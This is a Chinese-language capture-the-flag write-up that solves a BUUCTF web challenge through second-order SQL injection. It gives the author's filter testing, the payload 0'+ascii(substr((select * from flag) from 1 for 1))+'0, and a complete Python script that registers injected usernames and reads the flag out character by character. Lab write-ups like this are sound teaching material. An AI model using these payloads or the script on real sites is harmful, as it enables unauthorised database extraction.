1、进入题目之后只有一个登录界面,检查源代码信息并没有发现有用的信息,尝试万能密码登录也不行,结果如下:
2、进行目录扫描,发现了注册界面:register.php,结果如下:
3、那就访问注册界面,随便注册一个账户进行登录,f返回的界面中显示了注册的账户名,这里就想到了二次注入,结果如下:
4、进行注入的话那就先判断下被过滤的关键词,在注册时进行抓包,然后使用爆破模块进行测试,发现information和,被过滤了,开始以为'也被过滤了,但1'+2+'1可以注册,应该是语句的问题,而且返回的信息中也没有nononono,结果如下:
5、到这里想着后端代码应该就是select username from table where username = '传递的参数',这样的结构,经过测试可以通过:1' or password like '%f%测试列明,但是好像flag值所在的表与当前的表不是同一张表,而且也不知道flag值所在表的名称,在网上查看了以下,发现是忙才flag值所在表的表名称为flag,然后通过+运算进行无列明获取flag值,其payload:0'+ascii(substr((select * from flag) from 1 for 1))+'0,成功获取到flag值得第一位asii:102即f,结果如下:
6、确定payload之后那就需要通过脚本来获取flag值了,脚本信息如下:
import requests import time from bs4 import BeautifulSoup def get_flag(): flag = '' url = 'http://4ecc41d2-2490-46b9-a16a-f384574ca1ca.node4.buuoj.cn:81/' register_url = url + 'register.php' login_url = url + 'login.php' for i in range(1, 100): time.sleep(0.5) register_data = {"email": "{}@1.com".format(i), "username": "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i), "password": "1"} login_data = {"email": "{}@1.com".format(i), "password": "1"} requests.post(register_url, data=register_data) response_login = requests.post(login_url, data=login_data) bs = BeautifulSoup(response_login.text, 'html.parser') username = bs.find('span', class_='user-name') # 取返回页面数据的span class=user-name属性 number = username.text flag += chr(int(number)) print("\r", end="") print(flag,end="") if __name__ == '__main__': get_flag()
脚本结果如下: